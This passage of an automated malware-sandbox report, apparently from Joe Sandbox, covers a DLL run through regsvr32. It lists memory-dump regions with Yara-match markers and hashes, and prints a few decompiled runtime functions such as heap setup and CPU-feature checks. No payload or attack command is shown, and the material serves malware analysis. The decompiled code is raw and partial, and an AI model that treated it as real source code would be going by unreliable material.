                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: b
                                                                                                  • API String ID: 0-1908338681
                                                                                                  • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                  • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                  • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                  • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y
                                                                                                  • API String ID: 0-579211002
                                                                                                  • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                  • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                  • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                  • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0}
                                                                                                  • API String ID: 0-2955618701
                                                                                                  • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                  • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                  • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                  • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6N
                                                                                                  • API String ID: 0-1503784733
                                                                                                  • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                  • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                                  • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                  • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: S}
                                                                                                  • API String ID: 0-4277866985
                                                                                                  • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                  • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                  • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                  • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: H-
                                                                                                  • API String ID: 0-1037293833
                                                                                                  • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                  • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                  • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                  • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: u*AR
                                                                                                  • API String ID: 0-611844632
                                                                                                  • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                  • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                  • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                  • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: g*`
                                                                                                  • API String ID: 0-1142845859
                                                                                                  • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                  • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                  • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                  • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5$
                                                                                                  • API String ID: 0-3756733592
                                                                                                  • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                  • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                  • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                  • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: n*=
                                                                                                  • API String ID: 0-1578461029
                                                                                                  • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                  • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                  • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                  • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0000000118000A878(long long __rax) {
                                                                                                  				signed int _t3;
                                                                                                  
                                                                                                  				_t3 = GetProcessHeap();
                                                                                                  				 *0x800227e8 = __rax;
                                                                                                  				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                  			}




                                                                                                  0x18000a87c
                                                                                                  0x18000a885
                                                                                                  0x18000a893

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                  • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                  • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                  • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                  • Instruction ID: 9f99ec4afe463c3d65e7891af141654ab130258026d8ae803094f8bcce9865b7
                                                                                                  • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                  • Instruction Fuzzy Hash: 25E10570E0470ACFDF58DFA8D49A8AEBBB2FB04348F004169D806E72A0D7749A55CBC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                  • Instruction ID: eb382a2fa6e1578c642a2b340c53041bb8e712ab39063332813b22c09c172f78
                                                                                                  • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                  • Instruction Fuzzy Hash: 34C1CEB9903609CFDB68CF38C49A59D3BF1AF64308F204119EC269A2A6D774D529CB48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                  • Instruction ID: e5b02273529ff4e2f98400db5e927122cac23ad4b6fe7fbd2e8477b3c24965a3
                                                                                                  • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                  • Instruction Fuzzy Hash: 75B11770E04B089FDFA8DFA8D48A9DEBBF2FB44348F004519D446B7291D7B8545ACB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                  • Instruction ID: 4fe12d4a6e3cc9b64fb4cb54069e3b39203353677e2ec66316daf6f8a452269a
                                                                                                  • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                  • Instruction Fuzzy Hash: E9B1F8716087C88FDBBECF24C8892DB7BA9FB45708F504219E9CA8E294DB745745CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                  • Instruction ID: 1d096e51794d3db9846404887e333cb43ad016351a2694671d0b9b609afeb9d9
                                                                                                  • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                  • Instruction Fuzzy Hash: C9814B70D08709EFCB58DFA8C49599EBBF1FB44344F40856EE849EB290DB749A49CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                  • Instruction ID: f68d8b730eb30d780e84700d1e9cdead8c86efb65c76e66bda06b0ba01d71305
                                                                                                  • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                  • Instruction Fuzzy Hash: D68106B151074D9BDF88CF28C8C99DD7BB0FB483A8FA56218FC0AA6254D774D885CB84
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                  • Instruction ID: 93caef3b9b6bfcdde1c3cf8e7958d832be8a0f06109a11dfebebd6992384d4d4
                                                                                                  • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                  • Instruction Fuzzy Hash: E261207061464D8BDF28DF78D4962AD3BE5FB44308F20613DEC669B2A2D774E906CB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                  • Instruction ID: 19a2a2ca75c567b856dc8e94e20d4c430e33315e6f4059fd7b522b9a56af02b0
                                                                                                  • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                  • Instruction Fuzzy Hash: AC710870508789CBDBF9CF24C8896DE7BE4FB88704F20461DE9999B2A0DB749685CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                  • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                  • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                  • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                  • Instruction ID: b368570bf1d350e4df222e20026aeb2e9dbe922920a386d4a5c04d39bade87b8
                                                                                                  • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                  • Instruction Fuzzy Hash: 8751F770518788CBDBBADF34C8992D97BB0FB58304F90861DD84E8E290DB785749DB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 56%
                                                                                                  			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                  				void* _t24;
                                                                                                  				int _t26;
                                                                                                  				signed int _t51;
                                                                                                  				void* _t52;
                                                                                                  				signed long long _t66;
                                                                                                  				signed long long _t74;
                                                                                                  				signed long long _t76;
                                                                                                  				signed long long _t77;
                                                                                                  				signed int* _t90;
                                                                                                  				signed long long _t95;
                                                                                                  				signed long long _t96;
                                                                                                  				signed long long _t98;
                                                                                                  				signed long long _t104;
                                                                                                  				long long _t115;
                                                                                                  				void* _t117;
                                                                                                  				void* _t120;
                                                                                                  				signed long long* _t123;
                                                                                                  				signed long long _t124;
                                                                                                  				signed long long _t126;
                                                                                                  				signed long long _t129;
                                                                                                  				signed long long*** _t132;
                                                                                                  
                                                                                                  				_t52 = __edi;
                                                                                                  				_t51 = __edx;
                                                                                                  				 *((long long*)(_t117 + 8)) = __rbx;
                                                                                                  				 *((long long*)(_t117 + 0x10)) = _t115;
                                                                                                  				 *((long long*)(_t117 + 0x18)) = __rsi;
                                                                                                  				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                  				_t132 = __rcx;
                                                                                                  				_t90 =  *_t66;
                                                                                                  				if (_t90 == 0) goto 0x800069ac;
                                                                                                  				_t124 =  *0x80021010; // 0x5388a1408558
                                                                                                  				_t111 = _t124 ^  *_t90;
                                                                                                  				asm("dec eax");
                                                                                                  				_t74 = _t124 ^ _t90[4];
                                                                                                  				asm("dec ecx");
                                                                                                  				asm("dec eax");
                                                                                                  				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
                                                                                                  				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
                                                                                                  				_t101 =  >  ? _t66 : _t76;
                                                                                                  				_t6 = _t115 + 0x20; // 0x20
                                                                                                  				_t102 = ( >  ? _t66 : _t76) + _t76;
                                                                                                  				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
                                                                                                  				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
                                                                                                  				_t7 = _t115 + 8; // 0x8
                                                                                                  				r8d = _t7;
                                                                                                  				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
                                                                                                  				_t24 = E0000000118000878C(_t66, _t111);
                                                                                                  				if (_t66 != 0) goto 0x800068e2;
                                                                                                  				_t104 = _t76 + 4;
                                                                                                  				r8d = 8;
                                                                                                  				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
                                                                                                  				_t129 = _t66;
                                                                                                  				_t26 = E0000000118000878C(_t66, _t111);
                                                                                                  				if (_t129 == 0) goto 0x800069ac;
                                                                                                  				_t123 = _t129 + _t76 * 8;
                                                                                                  				_t77 = _t129 + _t104 * 8;
                                                                                                  				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                  				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                  				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
                                                                                                  				memset(_t52, _t26, 0 << 0);
                                                                                                  				_t126 =  *0x80021010; // 0x5388a1408558
                                                                                                  				r8d = 0x40;
                                                                                                  				asm("dec eax");
                                                                                                  				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                  				_t95 =  *0x80021010; // 0x5388a1408558
                                                                                                  				asm("dec eax");
                                                                                                  				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                  				_t96 =  *0x80021010; // 0x5388a1408558
                                                                                                  				asm("dec eax");
                                                                                                  				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                                                  				_t98 =  *0x80021010; // 0x5388a1408558
                                                                                                  				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                  				asm("dec eax");
                                                                                                  				( *( *_t132))[2] = _t77 ^ _t98;
                                                                                                  				goto 0x800069af;
                                                                                                  				return 0xffffffff;
                                                                                                  			}

























                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 485612231-0
                                                                                                  • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                  • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                  • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                  • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 86%
                                                                                                  			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                  				intOrPtr _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				void* _t25;
                                                                                                  
                                                                                                  				_t25 = __r8;
                                                                                                  				r8d = 0;
                                                                                                  				 *0x800223a8 = r8d;
                                                                                                  				_t1 = _t25 + 1; // 0x1
                                                                                                  				r9d = _t1;
                                                                                                  				asm("cpuid");
                                                                                                  				_v16 = r9d;
                                                                                                  				_v16 = 0;
                                                                                                  				_v20 = __ebx;
                                                                                                  				_v12 = __edx;
                                                                                                  				if (0 != 0x18001000) goto 0x80007101;
                                                                                                  				asm("xgetbv");
                                                                                                  				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                  				r8d =  *0x800223a8; // 0x1
                                                                                                  				r8d =  ==  ? r9d : r8d;
                                                                                                  				 *0x800223a8 = r8d;
                                                                                                  				 *0x800223ac = r8d;
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
